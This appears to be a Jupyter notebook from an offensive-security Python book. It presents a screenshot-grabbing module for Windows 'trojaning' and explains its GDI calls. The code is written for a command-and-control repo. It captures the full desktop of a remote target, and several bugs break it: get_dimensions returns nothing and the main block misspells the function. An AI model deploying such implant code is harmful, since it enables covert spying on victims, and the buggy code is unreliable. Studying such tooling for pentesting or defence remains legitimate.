<a href="https://colab.research.google.com/github/damianiRiccardo90/BHP/blob/master/C8-Common_Trojaning_Tasks_On_Windows/Taking_Screenshots.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>

### *__Common Trojaning Tasks On Windows__*

Most pieces of malware and penetration testing frameworks include the capability to take screenshots on the remote target. This can help capture images, video frames, or other sensitive data that you might not see with a packet capture or keylogger. Thankfully, we can use the __pywin32__ package to make native calls to the Windows API to grab them. Install the package with __pip__:

```
pip install pywin32
```

A screenshot grabber will use the Windows Graphics Device Interface (GDI) to determine necessary properties, such as the total screen size, and to grab the image. Some screenshot software will grab a picture of only the currently active window or application, but we'll capture the entire screen. Let's get started. Crack open __screenshotter.py__ and drop in the following code:

In [ ]:
import base64
import win32api
import win32con
import win32gui
import win32ui

def get_dimensions(): #[1]
    width = win32api.GetSystemMetrics(win32con.SM_CXVIRTUALSCREEN)
    height = win32api.GetSystemMetrics(win32con.SM_CYVIRTUALSCREEN)
    left = win32api.GetSystemMetrics(win32con.SM_XVIRTUALSCREEN)
    top = win32api.GetSystemMetrics(win32con.SM_YVIRTUALSCREEN)

def screenshot(name='screenshot'):
    hdesktop = win32gui.GetDesktopWindow() #[2]
    width, height, left, top = get_dimensions()

    desktop_dc = win32gui.GetWindowDC(hdesktop) #[3]
    img_dc = win32ui.CreateDCFromHandle(desktop_dc)
    mem_dc = img_dc.CreateCompatibleDC() #[4]

    screenshot = win32ui.CreateBitmap() #[5]
    screenshot.CreateCompatibleBitmap(img_dc, width, height)
    mem_dc.SelectObject(screenshot)

    mem_dc.BitBlt((0,0), (width, height), img_dc, (left, top), win32con.SRCCOPY) #[6]
    screenshot.SaveBitmapFile(mem_dc, f'{name}.bmp') #[7]

    mem_dc.DeleteDC()
    win32gui.DeleteObject(screenshot.GetHandle())

def run(): #[8]
    screenshot()
    with open('screenshot.bmp') as f:
        img = f.read()
    return img

if __name__ == '__main__':
    screeshot()

Let's review what this little script does. We acquire a handle to the entire desktop __[2]__, which includes the entire viewable area across multiple monitors. We then determine the size of the screen (or screens) __[1]__ so that we know the dimensions required for the screenshot. We create a device context using the __GetWindowDC__ __[3]__ function call and pass in a handle to the desktop. (Learn more about device contexts and GDI programming on the Microsoft Developer Network [__MSDN__] at https://msdn.microsoft.com.) Next, create a memory-based device context __[4]__, where we'll store our image capture until we write the bitmap bytes to a file. We then create a bitmap object __[5]__ that is set to the device context of our desktop. The __SelectObject__ call then sets the memory-based device context to point at the bitmap object that we're capturing.
We use the __BitBlt__ __[6]__ function to take a bit-for-bit copy of the desktop image and store it in the memory-based context. Think of this as a __memcpy__ call for GDI objects. The final step is to dump this image to disk __[7]__.

This script is easy to test: Just run it from the command line and check the directory for your __screenshot.bmp__ file. You can also include this script in your Github command and control repo, since the __run__ function __[8]__ calls the __screenshot__ function to create the image and then reads and returns the file data.

Let's move on to executing shellcode.